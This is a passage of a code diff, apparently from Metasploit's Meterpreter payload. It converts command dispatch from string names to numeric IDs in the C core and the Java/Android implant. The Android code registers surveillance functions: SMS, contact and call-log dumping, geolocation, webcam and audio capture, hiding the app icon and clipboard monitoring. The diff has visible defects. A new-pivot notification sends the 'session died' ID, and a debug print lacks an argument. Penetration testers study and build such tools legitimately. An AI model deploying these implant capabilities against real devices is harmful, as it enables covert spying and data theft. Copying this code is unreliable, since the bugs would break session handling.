-typedef VOID (*PCMDADDED)(const char* commandName);
+typedef DWORD (*PSTAGELESSINIT)(UINT extensionId, LPBYTE data, DWORD dataSize);
-typedef DWORD (*PSTAGELESSINIT)(LPBYTE data, DWORD dataSize);
 
 typedef struct _EXTENSION
 {
 	HMODULE library;
 	PSRVINIT init;
 	PSRVDEINIT deinit;
-	PSRVGETNAME getname;
 	PCMDADDED commandAdded;
 	PSTAGELESSINIT stagelessInit;
 	Command* start;
 	Command* end;
-	char name[16];
 } EXTENSION, *PEXTENSION;
 
 #endif

c/meterpreter/source/metsrv/remote_dispatch.c

@@ -22,22 +22,23 @@ BOOL request_core_patch_url(Remote* remote, Packet* packet, DWORD* result);
 // Dispatch table
 Command customCommands[] =
 {
-	COMMAND_REQ("core_loadlib", request_core_loadlib),
+	COMMAND_REQ(COMMAND_ID_CORE_LOADLIB, request_core_loadlib),
-	COMMAND_REQ("core_enumextcmd", request_core_enumextcmd),
+	COMMAND_REQ(COMMAND_ID_CORE_ENUMEXTCMD, request_core_enumextcmd),
-	COMMAND_REQ("core_machine_id", request_core_machine_id),
+	COMMAND_REQ(COMMAND_ID_CORE_MACHINE_ID, request_core_machine_id),
-	COMMAND_REQ("core_get_session_guid", request_core_get_session_guid),
+	COMMAND_REQ(COMMAND_ID_CORE_GET_SESSION_GUID, request_core_get_session_guid),
-	COMMAND_REQ("core_set_session_guid", request_core_set_session_guid),
+	COMMAND_REQ(COMMAND_ID_CORE_SET_SESSION_GUID, request_core_set_session_guid),
-	COMMAND_REQ("core_set_uuid", request_core_set_uuid),
+	COMMAND_REQ(COMMAND_ID_CORE_SET_UUID, request_core_set_uuid),
-	COMMAND_REQ("core_pivot_add", request_core_pivot_add),
+	COMMAND_REQ(COMMAND_ID_CORE_PIVOT_ADD, request_core_pivot_add),
-	COMMAND_REQ("core_pivot_remove", request_core_pivot_remove),
+	COMMAND_REQ(COMMAND_ID_CORE_PIVOT_REMOVE, request_core_pivot_remove),
-	COMMAND_INLINE_REP("core_patch_url", request_core_patch_url),
+	COMMAND_INLINE_REP(COMMAND_ID_CORE_PATCH_URL, request_core_patch_url),
 	COMMAND_TERMINATOR
 };
 
 typedef struct _EnumExtensions
 {
 	Packet* pResponse;
-	char* lpExtensionName;
+	UINT command_id_start;
+	UINT command_id_end;
 } EnumExtensions, * PEnumExtensions;
 
 
@@ -87,16 +88,13 @@ BOOL ext_cmd_callback(LPVOID pState, LPVOID pData)
 	if (pEnum != NULL && pEnum->pResponse != NULL && pData != NULL)
 	{
 		PEXTENSION pExt = (PEXTENSION)pData;
-		if (pExt->name[0] != '\0' && pEnum->lpExtensionName != NULL && strcmp(pExt->name, pEnum->lpExtensionName) == 0)
+		for (command = pExt->start; command != pExt->end; command = command->next)
 		{
-			dprintf("[LISTEXT] Found extension: %s", pExt->name);
+			if (pEnum->command_id_start < command->command_id && command->command_id < pEnum->command_id_end)
-			for (command = pExt->start; command != pExt->end; command = command->next)
 			{
-				packet_add_tlv_string(pEnum->pResponse, TLV_TYPE_STRING, command->method);
+				dprintf("[DISPATCH] Adding command ID %u", command->command_id);
+				packet_add_tlv_uint(pEnum->pResponse, TLV_TYPE_UINT, command->command_id);
 			}
-			dprintf("[LISTEXT] Finished listing extension: %s", pExt->name);
-
-			return TRUE;
 		}
 	}
 	return FALSE;
@@ -131,9 +129,10 @@ DWORD request_core_enumextcmd(Remote* remote, Packet* packet)
 	{
 		EnumExtensions enumExt;
 		enumExt.pResponse = pResponse;
-		enumExt.lpExtensionName = packet_get_tlv_value_string(packet, TLV_TYPE_STRING);
+		enumExt.command_id_start = packet_get_tlv_value_uint(packet, TLV_TYPE_UINT);
+		enumExt.command_id_end = packet_get_tlv_value_uint(packet, TLV_TYPE_LENGTH) + enumExt.command_id_start;
 
-		dprintf("[LISTEXTCMD] Listing extension commands for %s ...", enumExt.lpExtensionName);
+		dprintf("[LISTEXTCMD] Listing extension commands between %u and %u", enumExt.command_id_start, enumExt.command_id_end);
 		// Start by enumerating the names of the extensions
 		bResult = list_enumerate(gExtensionList, ext_cmd_callback, &enumExt);
 
@@ -182,26 +181,25 @@ VOID deregister_dispatch_routines(Remote * remote)
 
 /*
  * @brief Perform the initialisation of stageless extensions, if rquired.
- * @param extensionName The name of the extension to initialise.
+ * @param extensionId The id of the extension
  * @param data Pointer to the data containing the initialisation data.
  * @param dataSize Size of the data referenced by \c data.
  * @returns Indication of success or failure.
  */
-DWORD stagelessinit_extension(const char* extensionName, LPBYTE data, DWORD dataSize)
+DWORD stagelessinit_extension(UINT extensionId, LPBYTE data, DWORD dataSize)
 {
-	dprintf("[STAGELESSINIT] searching for extension init for %s in %p", extensionName, gExtensionList);
+	dprintf("[STAGELESSINIT] searching for extension init for %u in %p", extensionId, gExtensionList);
 	dprintf("[STAGELESSINIT] extension list start is %p", gExtensionList->start);
 	for (PNODE node = gExtensionList->start; node != NULL; node = node->next)
 	{
 		PEXTENSION ext = (PEXTENSION)node->data;
-		dprintf("[STAGELESSINIT] comparing to %s (init is %p)", ext->name, ext->stagelessInit);
+		if (ext->stagelessInit != NULL)
-		if (strcmp(ext->name, extensionName) == 0 && ext->stagelessInit != NULL)
 		{
-			dprintf("[STAGELESSINIT] found for %s", extensionName);
+			dprintf("[STAGELESSINIT] passing stageless init");
-			return ext->stagelessInit(data, dataSize);
+			ext->stagelessInit(extensionId, data, dataSize);
 		}
 	}
-	return ERROR_NOT_FOUND;
+	return ERROR_SUCCESS;
 }
 
 /*
@@ -230,7 +228,6 @@ DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* remot
 		{
 			pExtension->init = (PSRVINIT)GetProcAddressR(pExtension->library, "InitServerExtension");
 			pExtension->deinit = (PSRVDEINIT)GetProcAddressR(pExtension->library, "DeinitServerExtension");
-			pExtension->getname = (PSRVGETNAME)GetProcAddressR(pExtension->library, "GetExtensionName");
 			pExtension->commandAdded = (PCMDADDED)GetProcAddressR(pExtension->library, "CommandAdded");
 			pExtension->stagelessInit = (PSTAGELESSINIT)GetProcAddressR(pExtension->library, "StagelessInit");
 		}
@@ -238,7 +235,6 @@ DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* remot
 		{
 			pExtension->init = (PSRVINIT)GetProcAddress(pExtension->library, "InitServerExtension");
 			pExtension->deinit = (PSRVDEINIT)GetProcAddress(pExtension->library, "DeinitServerExtension");
-			pExtension->getname = (PSRVGETNAME)GetProcAddress(pExtension->library, "GetExtensionName");
 			pExtension->commandAdded = (PCMDADDED)GetProcAddress(pExtension->library, "CommandAdded");
 			pExtension->stagelessInit = (PSTAGELESSINIT)GetProcAddress(pExtension->library, "StagelessInit");
 		}
@@ -261,15 +257,10 @@ DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* remot
 				{
 					for (Command* command = pExtension->end; command != NULL; command = command->next)
 					{
-						pExtension->commandAdded(command->method);
+						pExtension->commandAdded(command->command_id);
 					}
 				}
 
-				if (pExtension->getname)
-				{
-					pExtension->getname(pExtension->name, sizeof(pExtension->name));
-				}
-
 				list_push(gExtensionList, pExtension);
 			}
 			else
@@ -283,7 +274,8 @@ DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* remot
 		{
 			for (Command* command = pExtension->start; command != pExtension->end; command = command->next)
 			{
-				packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
+				dprintf("[LOAD EXTENSION] Adding command ID to response: %u", command->command_id);
+				packet_add_tlv_uint(response, TLV_TYPE_UINT, command->command_id);
 
 				// inform existing extensions of the new commands
 				for (PNODE node = gExtensionList->start; node != NULL; node = node->next)
@@ -292,7 +284,7 @@ DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* remot
 					// don't inform the extension of itself
 					if (ext != pExtension && ext->commandAdded)
 					{
-						ext->commandAdded(command->method);
+						ext->commandAdded(command->command_id);
 					}
 				}
 			}

c/meterpreter/source/metsrv/remote_dispatch.h

@@ -7,7 +7,7 @@ DWORD request_core_enumextcmd(Remote* pRemote, Packet* pPacket);
 DWORD request_core_loadlib(Remote *pRemote, Packet *pPacket);
 
 DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* pRemote, Packet* pResponse, Command* pFirstCommand);
-DWORD stagelessinit_extension(const char* extensionName, LPBYTE data, DWORD dataSize);
+DWORD stagelessinit_extension(UINT extensionId, LPBYTE data, DWORD dataSize);
 
 VOID register_dispatch_routines();
 VOID deregister_dispatch_routines(Remote * remote);

c/meterpreter/source/metsrv/server_pivot_named_pipe.c

@@ -211,7 +211,7 @@ static DWORD read_pipe_to_packet(NamedPipeContext* ctx, LPBYTE source, DWORD sou
 
 					// with the session now established, we need to inform metasploit of the new connection
 					dprintf("[PIPE] Informing MSF of the new named pipe pivot");
-					Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_session_new");
+					Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_CORE_PIVOT_SESSION_DIED);
 					packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&ctx->pivot_session_guid, sizeof(ctx->pivot_session_guid));
 					packet_add_tlv_raw(notification, TLV_TYPE_PIVOT_ID, (LPVOID)&ctx->pivot_id, sizeof(ctx->pivot_id));
 					packet_transmit(ctx->remote, notification, NULL);
@@ -563,7 +563,7 @@ static DWORD server_notify(Remote* remote, LPVOID entryContext, LPVOID threadCon
 				ResetEvent(serverCtx->read_overlap.hEvent);
 
 				// Prepare the notification packet for dispatching
-				Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_session_died");
+				Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_CORE_PIVOT_SESSION_DIED);
 				packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&serverCtx->pivot_session_guid, sizeof(serverCtx->pivot_session_guid));
 
 				// Clean up the pivot context
@@ -646,7 +646,7 @@ static DWORD server_notify(Remote* remote, LPVOID entryContext, LPVOID threadCon
 			// session that's come back out of nowhere (transport switching, sleeping, etc). Create a packet
 			// that will request the guid, and track a random request ID to find the response later on.
 			dprintf("[NP-SERVER] Creating the guid request packet");
-			Packet* getGuidPacket = packet_create(PACKET_TLV_TYPE_REQUEST, "core_get_session_guid");
+			Packet* getGuidPacket = packet_create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_CORE_GET_SESSION_GUID);
 			dprintf("[NP-SERVER] adding the request ID to the guid request packet");
 			packet_add_request_id(getGuidPacket);
 			CHAR* requestId = packet_get_tlv_value_string(getGuidPacket, TLV_TYPE_REQUEST_ID);

c/meterpreter/source/metsrv/server_setup.c

@@ -80,18 +80,22 @@ LPBYTE load_stageless_extensions(Remote* remote, MetsrvExtension* stagelessExten
 	// once we have reached the end, we may have extension initializers
 	LPBYTE initData = (LPBYTE)(&stagelessExtensions->size) + sizeof(stagelessExtensions->size);
 
-	while (*initData != '\0')
+	// Config blog is terminated by a -1
+	while (*(UINT*)initData != 0xFFFFFFFF)
 	{
-		const char* extensionName = (const char*)initData;
+		UINT extensionId = *(UINT*)initData;
-		LPBYTE data = initData + strlen(extensionName) + 1 + sizeof(DWORD);
+		DWORD dataSize = *(DWORD*)(initData + sizeof(DWORD));
-		DWORD dataSize = *(DWORD*)(data - sizeof(DWORD));
+		UINT offset = sizeof(UINT) + sizeof(DWORD);
-		dprintf("[STAGELESS] init data at %p, name %s, size is %d", extensionName, extensionName, dataSize);
+		LPBYTE data = initData + offset;
-		stagelessinit_extension(extensionName, data, dataSize);
+		dprintf("[STAGELESS] init data at %p, ID %u, size is %d", initData, extensionId, dataSize);
+		stagelessinit_extension(extensionId, data, dataSize);
 		initData = data + dataSize;
+		dprintf("[STAGELESS] init done, now pointing to %p", initData);
+		dprintf("[STAGELESS] %p contains %x", *(UINT*)initData);
 	}
 
 	dprintf("[SERVER] All stageless extensions initialised");
-	return initData;
+	return initData + sizeof(UINT);
 }
 
 static Transport* create_transport(Remote* remote, MetsrvTransportCommon* transportCommon, LPDWORD size)
@@ -372,6 +376,7 @@ DWORD server_setup(MetsrvConfig* config)
 			// this has to be done after dispatch routine are registered
 			LPBYTE configEnd = load_stageless_extensions(remote, (MetsrvExtension*)((LPBYTE)config->transports + transportSize));
 
+			dprintf("[SERVER] Copying configuration ..");
 			// the original config can actually be mapped as RX in cases such as when stageless payloads
 			// are baked directly into .NET assemblies. We need to make sure that this area of memory includes
 			// The writable flag as well otherwise we get access violations when we're interacting with the
@@ -380,6 +385,7 @@ DWORD server_setup(MetsrvConfig* config)
 			DWORD_PTR configSize = (DWORD_PTR)configEnd - (DWORD_PTR)config;
 			remote->orig_config = (MetsrvConfig*)malloc(configSize);
 			memcpy_s(remote->orig_config, configSize, config, configSize);
+			dprintf("[SERVER] Config copied..");
 
 			// Store our process token
 			if (!OpenThreadToken(remote->server_thread, TOKEN_ALL_ACCESS, TRUE, &remote->server_token))
@@ -408,6 +414,7 @@ DWORD server_setup(MetsrvConfig* config)
 
 			remote->sess_start_time = current_unix_timestamp();
 
+			dprintf("[SERVER] Time to kick off connectivity to MSF ...");
 			// loop through the transports, reconnecting each time.
 			while (remote->transport)
 			{

c/meterpreter/workspace/meterpreter.sln

@@ -52,6 +52,22 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_unhook", "ext_se
 EndProject
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "jpeg", "jpeg\jpeg.vcxproj", "{E61592E1-28F4-4AFC-9EE1-9BE833A061C1}"
 EndProject
+Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Common", "Common", "{EDE086F4-77A8-452B-A189-708B55F625F4}"
+	ProjectSection(SolutionItems) = preProject
+		..\source\common\common.h = ..\source\common\common.h
+		..\source\common\common_base.h = ..\source\common\common_base.h
+		..\source\common\common_channel.h = ..\source\common\common_channel.h
+		..\source\common\common_command_ids.h = ..\source\common\common_command_ids.h
+		..\source\common\common_config.h = ..\source\common\common_config.h
+		..\source\common\common_core.h = ..\source\common\common_core.h
+		..\source\common\common_list.h = ..\source\common\common_list.h
+		..\source\common\common_metapi.h = ..\source\common\common_metapi.h
+		..\source\common\common_pivot_tree.h = ..\source\common\common_pivot_tree.h
+		..\source\common\common_remote.h = ..\source\common\common_remote.h
+		..\source\common\common_scheduler.h = ..\source\common\common_scheduler.h
+		..\source\common\common_thread.h = ..\source\common\common_thread.h
+	EndProjectSection
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		r7_release|Win32 = r7_release|Win32

java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java

@@ -4,9 +4,10 @@ import android.content.Context;
 import android.os.Handler;
 import android.os.Looper;
 
+import com.metasploit.meterpreter.command.CommandId;
 import com.metasploit.meterpreter.android.stdapi_sys_config_getuid;
-import com.metasploit.meterpreter.android.*;
 import com.metasploit.meterpreter.android.stdapi_ui_desktop_screenshot;
+import com.metasploit.meterpreter.android.*;
 import com.metasploit.meterpreter.stdapi.*;
 
 import com.metasploit.stage.Config;
@@ -104,71 +105,66 @@ public class AndroidMeterpreter extends Meterpreter {
     }
 
     @Override
-    public String[] loadExtension(byte[] data) throws Exception {
+    public Integer[] loadExtension(byte[] data) throws Exception {
         getCommandManager().resetNewCommands();
         CommandManager mgr = getCommandManager();
-        Loader.cwd = new File(writeableDir);
+        Loader.setCWD(new File(writeableDir));
-        mgr.registerCommand("channel_create_audio_output", channel_create_audio_output.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_CHDIR, stdapi_fs_chdir.class);
-        mgr.registerCommand("channel_create_stdapi_fs_file", channel_create_stdapi_fs_file.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_DELETE_DIR, stdapi_fs_delete_dir.class);
-        mgr.registerCommand("channel_create_stdapi_net_tcp_client", channel_create_stdapi_net_tcp_client.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_DELETE_FILE, stdapi_fs_delete_file.class);
-        mgr.registerCommand("channel_create_stdapi_net_tcp_server", channel_create_stdapi_net_tcp_server.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_FILE_EXPAND_PATH, stdapi_fs_file_expand_path_android.class);
-        mgr.registerCommand("channel_create_stdapi_net_udp_client", channel_create_stdapi_net_udp_client.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_FILE_MOVE, stdapi_fs_file_move.class);
-        mgr.registerCommand("stdapi_fs_chdir", stdapi_fs_chdir.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_FILE_COPY, stdapi_fs_file_copy.class);
-        mgr.registerCommand("stdapi_fs_delete_dir", stdapi_fs_delete_dir.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_GETWD, stdapi_fs_getwd.class);
-        mgr.registerCommand("stdapi_fs_delete_file", stdapi_fs_delete_file.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_LS, stdapi_fs_ls.class);
-        mgr.registerCommand("stdapi_fs_file_expand_path", stdapi_fs_file_expand_path_android.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_MKDIR, stdapi_fs_mkdir.class);
-        mgr.registerCommand("stdapi_fs_file_move", stdapi_fs_file_move.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_MD5, stdapi_fs_md5.class);
-        mgr.registerCommand("stdapi_fs_file_copy", stdapi_fs_file_copy.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_SEARCH, stdapi_fs_search.class);
-        mgr.registerCommand("stdapi_fs_getwd", stdapi_fs_getwd.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_SEPARATOR, stdapi_fs_separator.class);
-        mgr.registerCommand("stdapi_fs_ls", stdapi_fs_ls.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_STAT, stdapi_fs_stat.class);
-        mgr.registerCommand("stdapi_fs_mkdir", stdapi_fs_mkdir.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_SHA1, stdapi_fs_sha1.class);
-        mgr.registerCommand("stdapi_fs_md5", stdapi_fs_md5.class);
+        mgr.registerCommand(CommandId.STDAPI_NET_CONFIG_GET_INTERFACES, stdapi_net_config_get_interfaces_V1_4.class);
-        mgr.registerCommand("stdapi_fs_search", stdapi_fs_search.class);
+        mgr.registerCommand(CommandId.STDAPI_NET_CONFIG_GET_ROUTES, stdapi_net_config_get_routes_V1_4.class);
-        mgr.registerCommand("stdapi_fs_separator", stdapi_fs_separator.class);
+        mgr.registerCommand(CommandId.STDAPI_NET_SOCKET_TCP_SHUTDOWN, stdapi_net_socket_tcp_shutdown_V1_3.class);
-        mgr.registerCommand("stdapi_fs_stat", stdapi_fs_stat.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_GETUID, stdapi_sys_config_getuid.class);
-        mgr.registerCommand("stdapi_fs_sha1", stdapi_fs_sha1.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_SYSINFO, stdapi_sys_config_sysinfo_android.class);
-        mgr.registerCommand("stdapi_net_config_get_interfaces", stdapi_net_config_get_interfaces_V1_4.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_LOCALTIME, stdapi_sys_config_localtime.class);
-        mgr.registerCommand("stdapi_net_config_get_routes", stdapi_net_config_get_routes_V1_4.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_EXECUTE, stdapi_sys_process_execute_V1_3.class);
-        mgr.registerCommand("stdapi_net_socket_tcp_shutdown", stdapi_net_socket_tcp_shutdown_V1_3.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_GET_PROCESSES, stdapi_sys_process_get_processes_android.class);
-        mgr.registerCommand("stdapi_sys_config_getuid", stdapi_sys_config_getuid.class);
+        mgr.registerCommand(CommandId.STDAPI_UI_DESKTOP_SCREENSHOT, stdapi_ui_desktop_screenshot.class);
-        mgr.registerCommand("stdapi_sys_config_sysinfo", stdapi_sys_config_sysinfo_android.class);
-        mgr.registerCommand("stdapi_sys_config_localtime", stdapi_sys_config_localtime.class);
-        mgr.registerCommand("stdapi_sys_process_execute", stdapi_sys_process_execute_V1_3.class);
-        mgr.registerCommand("stdapi_sys_process_get_processes", stdapi_sys_process_get_processes_android.class);
-        mgr.registerCommand("stdapi_ui_desktop_screenshot", stdapi_ui_desktop_screenshot.class);
         if (context != null) {
-            mgr.registerCommand("appapi_app_list", appapi_app_list.class);
+            mgr.registerCommand(CommandId.APPAPI_APP_LIST, appapi_app_list.class);
-            mgr.registerCommand("appapi_app_run", appapi_app_run.class);
+            mgr.registerCommand(CommandId.APPAPI_APP_RUN, appapi_app_run.class);
-            mgr.registerCommand("appapi_app_install", appapi_app_install.class);
+            mgr.registerCommand(CommandId.APPAPI_APP_INSTALL, appapi_app_install.class);
-            mgr.registerCommand("appapi_app_uninstall", appapi_app_uninstall.class);
+            mgr.registerCommand(CommandId.APPAPI_APP_UNINSTALL, appapi_app_uninstall.class);
-            mgr.registerCommand("webcam_audio_record", webcam_audio_record_android.class);
+            mgr.registerCommand(CommandId.STDAPI_WEBCAM_AUDIO_RECORD, stdapi_webcam_audio_record_android.class);
-            mgr.registerCommand("webcam_list", webcam_list_android.class);
+            mgr.registerCommand(CommandId.STDAPI_WEBCAM_LIST, webcam_list_android.class);
-            mgr.registerCommand("webcam_start", webcam_start_android.class);
+            mgr.registerCommand(CommandId.STDAPI_WEBCAM_START, webcam_start_android.class);
-            mgr.registerCommand("webcam_stop", webcam_stop_android.class);
+            mgr.registerCommand(CommandId.STDAPI_WEBCAM_STOP, webcam_stop_android.class);
-            mgr.registerCommand("webcam_get_frame", webcam_get_frame_android.class);
+            mgr.registerCommand(CommandId.STDAPI_WEBCAM_GET_FRAME, webcam_get_frame_android.class);
-            mgr.registerCommand("android_send_sms", android_send_sms.class);
+            mgr.registerCommand(CommandId.ANDROID_SEND_SMS, android_send_sms.class);
-            mgr.registerCommand("android_dump_sms", android_dump_sms.class);
+            mgr.registerCommand(CommandId.ANDROID_DUMP_SMS, android_dump_sms.class);
-            mgr.registerCommand("android_dump_contacts", android_dump_contacts.class);
+            mgr.registerCommand(CommandId.ANDROID_DUMP_CONTACTS, android_dump_contacts.class);
-            mgr.registerCommand("android_dump_calllog", android_dump_calllog.class);
+            mgr.registerCommand(CommandId.ANDROID_DUMP_CALLLOG, android_dump_calllog.class);
-            mgr.registerCommand("android_check_root", android_check_root.class);
+            mgr.registerCommand(CommandId.ANDROID_CHECK_ROOT, android_check_root.class);
-            mgr.registerCommand("android_geolocate", android_geolocate.class);
+            mgr.registerCommand(CommandId.ANDROID_GEOLOCATE, android_geolocate.class);
-            mgr.registerCommand("android_wlan_geolocate", android_wlan_geolocate.class);
+            mgr.registerCommand(CommandId.ANDROID_WLAN_GEOLOCATE, android_wlan_geolocate.class);
-            mgr.registerCommand("android_interval_collect", android_interval_collect.class);
+            mgr.registerCommand(CommandId.ANDROID_INTERVAL_COLLECT, android_interval_collect.class);
-            mgr.registerCommand("android_activity_start", android_activity_start.class);
+            mgr.registerCommand(CommandId.ANDROID_ACTIVITY_START, android_activity_start.class);
-            mgr.registerCommand("android_hide_app_icon", android_hide_app_icon.class);
+            mgr.registerCommand(CommandId.ANDROID_HIDE_APP_ICON, android_hide_app_icon.class);
-            mgr.registerCommand("android_set_audio_mode", android_set_audio_mode.class);
+            mgr.registerCommand(CommandId.ANDROID_SET_AUDIO_MODE, android_set_audio_mode.class);
-            mgr.registerCommand("android_sqlite_query", android_sqlite_query.class);
+            mgr.registerCommand(CommandId.ANDROID_SQLITE_QUERY, android_sqlite_query.class);
-            mgr.registerCommand("android_wakelock", android_wakelock.class);
+            mgr.registerCommand(CommandId.ANDROID_WAKELOCK, android_wakelock.class);
-            mgr.registerCommand("android_set_wallpaper", android_set_wallpaper.class);
+            mgr.registerCommand(CommandId.ANDROID_SET_WALLPAPER, android_set_wallpaper.class);
-            mgr.registerCommand("extapi_clipboard_get_data", clipboard_get_data.class);
+            mgr.registerCommand(CommandId.EXTAPI_CLIPBOARD_GET_DATA, clipboard_get_data.class);
-            mgr.registerCommand("extapi_clipboard_set_data", clipboard_set_data.class);
+            mgr.registerCommand(CommandId.EXTAPI_CLIPBOARD_SET_DATA, clipboard_set_data.class);
-            mgr.registerCommand("extapi_clipboard_monitor_dump", clipboard_monitor_dump.class);
+            mgr.registerCommand(CommandId.EXTAPI_CLIPBOARD_MONITOR_DUMP, clipboard_monitor_dump.class);
-            mgr.registerCommand("extapi_clipboard_monitor_pause", clipboard_monitor_pause.class);
+            mgr.registerCommand(CommandId.EXTAPI_CLIPBOARD_MONITOR_PAUSE, clipboard_monitor_pause.class);
-            mgr.registerCommand("extapi_clipboard_monitor_purge", clipboard_monitor_purge.class);
+            mgr.registerCommand(CommandId.EXTAPI_CLIPBOARD_MONITOR_PURGE, clipboard_monitor_purge.class);
-            mgr.registerCommand("extapi_clipboard_monitor_resume", clipboard_monitor_resume.class);
+            mgr.registerCommand(CommandId.EXTAPI_CLIPBOARD_MONITOR_RESUME, clipboard_monitor_resume.class);
-            mgr.registerCommand("extapi_clipboard_monitor_start", clipboard_monitor_start.class);
+            mgr.registerCommand(CommandId.EXTAPI_CLIPBOARD_MONITOR_START, clipboard_monitor_start.class);
-            mgr.registerCommand("extapi_clipboard_monitor_stop", clipboard_monitor_stop.class);
+            mgr.registerCommand(CommandId.EXTAPI_CLIPBOARD_MONITOR_STOP, clipboard_monitor_stop.class);
         }
-        return getCommandManager().getNewCommands();
+        return getCommandManager().getNewCommandIds();
     }
 }

java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_webcam_audio_record_android.java

@@ -8,12 +8,12 @@ import android.media.MediaRecorder.AudioSource;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.command.Command;
-import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+import com.metasploit.meterpreter.stdapi.stdapi_webcam_audio_record;
 
 import java.io.ByteArrayOutputStream;
 import java.io.DataOutputStream;
 
-public class webcam_audio_record_android extends webcam_audio_record implements Command {
+public class stdapi_webcam_audio_record_android extends stdapi_webcam_audio_record implements Command {
 
     private static final int AUDIO_SAMPLE_RATE = 8000;
     private static final int AUDIO_CHANNEL_CONFIG = AudioFormat.CHANNEL_CONFIGURATION_MONO;

java/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_get_frame_android.java

@@ -8,9 +8,9 @@ import android.hardware.Camera.PictureCallback;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.command.Command;
-import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+import com.metasploit.meterpreter.stdapi.stdapi_webcam_audio_record;
 
-public class webcam_get_frame_android extends webcam_audio_record implements Command {
+public class webcam_get_frame_android extends stdapi_webcam_audio_record implements Command {
 
     private static final int TLV_EXTENSIONS = 20000;
     private static final int TLV_TYPE_WEBCAM_IMAGE = TLVPacket.TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1);

java/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_list_android.java

@@ -4,12 +4,12 @@ package com.metasploit.meterpreter.android;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.command.Command;
-import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+import com.metasploit.meterpreter.stdapi.stdapi_webcam_audio_record;
 
 import java.lang.reflect.Field;
 import java.lang.reflect.Method;
 
-public class webcam_list_android extends webcam_audio_record implements Command {
+public class webcam_list_android extends stdapi_webcam_audio_record implements Command {
 
     private static final int TLV_EXTENSIONS = 20000;
     private static final int TLV_TYPE_WEBCAM_NAME = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4);

java/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_start_android.java

@@ -13,12 +13,12 @@ import com.metasploit.meterpreter.AndroidMeterpreter;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.command.Command;
-import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+import com.metasploit.meterpreter.stdapi.stdapi_webcam_audio_record;
 
 import java.io.IOException;
 import java.lang.reflect.Method;
 
-public class webcam_start_android extends webcam_audio_record implements Command {
+public class webcam_start_android extends stdapi_webcam_audio_record implements Command {
 
     private static final int TLV_EXTENSIONS = 20000;
     private static final int TLV_TYPE_WEBCAM_INTERFACE_ID = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2);

java/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_stop_android.java

@@ -4,9 +4,9 @@ package com.metasploit.meterpreter.android;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.command.Command;
-import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+import com.metasploit.meterpreter.stdapi.stdapi_webcam_audio_record;
 
-public class webcam_stop_android extends webcam_audio_record implements Command {
+public class webcam_stop_android extends stdapi_webcam_audio_record implements Command {
 
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
 

java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Channel.java

@@ -4,6 +4,8 @@ import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
 
+import com.metasploit.meterpreter.command.CommandId;
+
 /**
  * A meterpreter channel. Channels are basically a collection of streams to interact with. Specialized subclasses of this class may handle special channels.
  *
@@ -138,16 +140,16 @@ public class Channel {
         if ((toRead == null || toRead.length > 0) && !closed) {
